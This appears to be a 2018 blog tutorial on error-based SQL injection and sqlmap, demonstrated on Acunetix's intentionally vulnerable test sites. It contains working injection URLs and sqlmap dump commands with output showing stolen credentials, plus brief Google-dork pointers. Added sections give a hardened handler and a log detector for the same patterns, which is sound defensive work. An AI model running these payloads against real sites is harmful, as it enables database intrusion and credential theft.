Error Based Injection

January 18, 2018

Error-based injection mainly targets Microsoft technologies such as ASP and ASPX. It works against MS-SQL databases and is a bit different from the previous attack, union-based injection, which was used against a MySQL database.

• Here the database will be MS-SQL.

 

Database:

MY-SQL : PHP

MS-SQL :  .asp or .aspx

 

Differences between Union and Error Based Injection

1. Extracting all tables at one time from the database

• Information_schema.tables will not return the entire list of table names.

2. MS SQL works on the STACK principle, meaning LAST IN FIRST OUT.

• Hence the table on top of the stack is the one fetched first during extraction.

3. Functions like database() and version() do not work in MS-SQL.

4. "order by" or "union" does not work on MS-SQL.

 

 

Target:

testasp.vulnweb.com

• It is a legal platform provided by Acunetix for security testing.

 

Step 1: Find a GET parameter in the URL of the website.

• We have to look for any Something=Something.

• E.g. id=1 or pid=16 or product=milk

http://testasp.vulnweb.com/showforum.asp?id=0

 

Step 2: Check the exception handling.

http://testasp.vulnweb.com/showforum.asp?id=0'

 

Step 3: Check the conditions required for further attack.

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=0;

 

Note: Error-based injection works on the LIFO rule: last in, first out.

For example, if we have a database with tables like the following:

threads -> 1

teacher->2

classes->3

fee->4

users->5

 

Step 4: http://testasp.vulnweb.com/showforum.asp?id=0 and 1=convert(int,(select top 1 table_name from information_schema.tables));

• Got Table : 'threads' X

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('threads')));

• Target : 'users'

 

Step 5: Get the respective columns of the users table

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='users' and column_name not in ('uname')));

• Target Column : uname, upass

 

Step 6: Get the uname and upass

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=convert(int,(select top 1 upass from users));

• uname:admin

• upass: none
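
Steps 2 and 3 only produce a useful answer when the id value is concatenated into the query and the database's own error text is sent back to the browser. The following added example (not code from the original post or from the test site) puts such a handler beside a hardened one; the forums table, the function names and the use of Python's sqlite3 in place of ASP and MS-SQL are assumptions made so that it runs offline.

```python
import re
import sqlite3

# Constructed in-memory data; sqlite3 stands in for the MS-SQL backend.
DB = sqlite3.connect(":memory:")
DB.executescript("""
    CREATE TABLE forums (id INTEGER PRIMARY KEY, title TEXT);
    INSERT INTO forums VALUES (0, 'General'), (1, 'Support');
""")

def show_forum_vulnerable(raw_id):
    """Concatenates the parameter and returns the database error to the client."""
    try:
        rows = DB.execute("SELECT title FROM forums WHERE id = " + raw_id).fetchall()
        return 200, [r[0] for r in rows]
    except sqlite3.Error as exc:
        return 500, str(exc)  # engine message reaches the browser

def show_forum_hardened(raw_id, log=print):
    """Checks the type, binds the value, keeps error detail in the server log."""
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        return 400, "Bad request"
    try:
        rows = DB.execute("SELECT title FROM forums WHERE id = ?", (int(raw_id),)).fetchall()
        return 200, [r[0] for r in rows]
    except sqlite3.Error as exc:
        log(f"db error: {exc!r}")  # detail stays server-side
        return 500, "Internal error"

if __name__ == "__main__":
    for probe in ("0", "0'", "0 and 1=0"):  # the inputs from Steps 1 to 3
        print(repr(probe), show_forum_vulnerable(probe), show_forum_hardened(probe))
```

The hardened handler gives the same generic 400 for the quote and for the boolean condition, so neither the error text nor a change in page content tells the client anything about the query.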

 

Stack Based Query

Requirements

1. SQLMAP: a Python-based automated vulnerability assessment and penetration testing tool.

2. Kali Linux: sqlmap is built into Kali Linux.

• You can also download the sqlmap version for Windows from its official website.

 

Introduction to SQL MAP

————————

Sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

 

Step 1: Open your Linux terminal

Step 2: python sqlmap.py -u "http://testphp.vulnweb.com/search.php?test=query" --dbs

Output:

Here we can see that we got the databases below.

[09:54:16] [INFO] fetching database names

Available databases [2]:

[*] acuart <------- Target Database

[*] information_schema

Step 3: Get the tables of the database

python sqlmap.py -u "http://testphp.vulnweb.com/search.php?test=query" -D acuart --tables

Here we got all the tables available in the acuart database.

Output:

[09:58:49] [INFO] fetching tables for database: 'acuart'

Database: acuart

[8 tables]

+-----------+
| artists   |
| carts     |
| categ     |
| featured  |
| guestbook |
| pictures  |
| products  |
| users     | -------> Target Table
+-----------+

Step 4: Get the columns of the users table

python sqlmap.py -u "http://testphp.vulnweb.com/search.php?test=query" -T users --columns

Output:

Database: acuart

Table: users

[8 columns]

+---------+--------------+
| Column  | Type         |
+---------+--------------+
| address | mediumtext   |
| cart    | varchar(100) |
| cc      | varchar(100) |
| email   | varchar(100) |
| name    | varchar(100) |
| pass    | varchar(100) | ---> Target
| phone   | varchar(100) |
| uname   | varchar(100) | ---> Target

 

Step 5: Get the data from the columns of the above table.

python sqlmap.py -u "http://testphp.vulnweb.com/search.php?test=query" -U test -T users --dump

Output:

Database: acuart

Table: users

[1 entry]

+---------------------------+--------------+----------------------------------+------+-------+---------+--------------------+---------+
| cc                        | name         | cart                             | pass | uname | phone   | email              | address |
+---------------------------+--------------+----------------------------------+------+-------+---------+--------------------+---------+
| De nave queimando asfalto | Hiago Junior | a929b42ddb394d84a486976ac5782afc | test | test  | 2323345 | jurandir@gmail.com | foda-se |
+---------------------------+--------------+----------------------------------+------+-------+---------+--------------------+---------+
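
Both the manual requests from the error-based steps and the sqlmap run above leave recognisable traces in web server access logs. The following added example (not part of the original post) scans log lines for them; the log lines, IP addresses, rule names and the sqlmap version string are constructed samples, and the User-Agent check is a weak signal because the client controls that header.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample lines (combined log format); addresses are documentation ranges.
SAMPLE_LOG = '''\
198.51.100.7 - - [18/Jan/2018:09:50:01 +0000] "GET /showforum.asp?id=0 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [18/Jan/2018:09:50:09 +0000] "GET /showforum.asp?id=0%27 HTTP/1.1" 500 1204 "-" "Mozilla/5.0"
198.51.100.7 - - [18/Jan/2018:09:50:30 +0000] "GET /showforum.asp?id=0%20and%201=0; HTTP/1.1" 200 310 "-" "Mozilla/5.0"
198.51.100.7 - - [18/Jan/2018:09:51:02 +0000] "GET /showforum.asp?id=0%20and%201=convert(int,(select%20top%201%20table_name%20from%20information_schema.tables)); HTTP/1.1" 500 1310 "-" "Mozilla/5.0"
203.0.113.20 - - [18/Jan/2018:09:54:16 +0000] "GET /search.php?test=query HTTP/1.1" 200 900 "-" "sqlmap/1.2#stable (http://sqlmap.org)"
192.0.2.44 - - [18/Jan/2018:09:55:00 +0000] "GET /showforum.asp?id=2 HTTP/1.1" 200 498 "-" "Mozilla/5.0"
'''

LINE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"$')

# Patterns are applied to the URL-decoded, lower-cased query string.
RULES = {
    "quote-probe": re.compile(r"=[^&=]*'\s*(?:&|$)"),             # Step 2
    "boolean-probe": re.compile(r"\band\s+\d+\s*=\s*\d+"),        # Step 3
    "convert-error": re.compile(r"convert\s*\(\s*int\s*,\s*\(\s*select\b"),
    "schema-enum": re.compile(r"information_schema\.(?:tables|columns)"),
}

def scan(log_text):
    """Return {client_ip: sorted names of the indicators seen from that client}."""
    hits = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        ip, _method, target, status, agent = m.groups()
        query = re.sub(r"\s+", " ", unquote_plus(target.partition("?")[2])).lower()
        fired = {name for name, rule in RULES.items() if rule.search(query)}
        if fired and status == "500":
            fired.add("error-returned")  # the probe reached the error path
        if "sqlmap/" in agent.lower():
            fired.add("sqlmap-user-agent")
        if fired:
            hits[ip] |= fired
    return {ip: sorted(names) for ip, names in hits.items()}

if __name__ == "__main__":
    for ip, names in scan(SAMPLE_LOG).items():
        print(ip, ", ".join(names))
```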

 

Google Hacking Database

Johnny I Hack Stuff: Searched --> Google --> Credit Cards

• Google Dorks

Filtering of results from the Google database.

#inurl - green line in Google Search

#intitle - blue line in Google Search

#intext - black line in Google Search

#filetype - type of file needed, i.e. pdf, ppt, docs etc.

• IP CAMERA

Searching tools

www.exploit-db.com

1 Comment
  1. Guy is very vague in his steps. Would be really helpful if you took your time and went through the steps instead of assuming the user knows what you're doing. It won't hurt the experienced users but it sure will help the novice ones.
